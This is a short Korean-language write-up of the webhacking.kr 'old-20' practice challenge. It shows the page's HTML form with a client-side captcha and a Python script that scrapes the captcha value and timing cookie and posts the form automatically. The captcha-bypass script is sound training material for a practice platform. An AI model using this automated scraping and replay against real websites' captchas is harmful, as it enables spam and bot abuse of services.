old-20 (200)

첫 화면이다.

페이지 소스는 아래와 같다.

<html>
<head>
<title>Challenge 20</title>
<style type="text/css">
body { background:black; color:white; font-size:10pt; }
input { background:silver; color:black; font-size:9pt; }
</style>
</head>
<body>
<center><font size=2>time limit : 2 second</font></center>
<form name=lv5frm method=post>
<table border=0>
<tr><td>nickname</td><td><input type=text name=id size=10 maxlength=10></td></tr>
<tr><td>comment</td><td><input type=text name=cmt size=50 maxlength=50></td></tr>
<tr><td>captcha</td><td><input type=text name=captcha><input type=button name=captcha_ value="UyQb67zXW6" style="border:0;background=lightgreen"></td></tr>
<tr><td><input type=button value=Submit onclick=ck()></td><td><input type=reset value=reset></td></tr>
</table>
<script>
function ck(){
  if(lv5frm.id.value=="") { lv5frm.id.focus(); return; }
  if(lv5frm.cmt.value=="") { lv5frm.cmt.focus(); return; }
  if(lv5frm.captcha.value=="") { lv5frm.captcha.focus(); return; }
  if(lv5frm.captcha.value!=lv5frm.captcha_.value) { lv5frm.captcha.focus(); return; }
  lv5frm.submit();
}
</script>
</body>
</html>

다음과 같이 파이썬 코드를 짜고 실행하면 문제가 풀린다.

import requests

url = 'https://webhacking.kr/challenge/code-4/'
cookies = {'PHPSESSID': 'MY_PHPSESSID'}
payload = {'id': 'donghyunlee00',
           'cmt': 'Hello, world!'}

r = requests.get(url, cookies=cookies)
content = r.text
idx = content.index('captcha_ ') + 16
payload['captcha'] = content[idx:idx+10]
cookies['st'] = r.headers['Set-Cookie'].split('=')[1]
r = requests.post(url, data=payload, cookies=cookies)
print(r.text)

Previousold-19 (150)Nextold-21 (250)

Last updated 5 years ago

Was this helpful?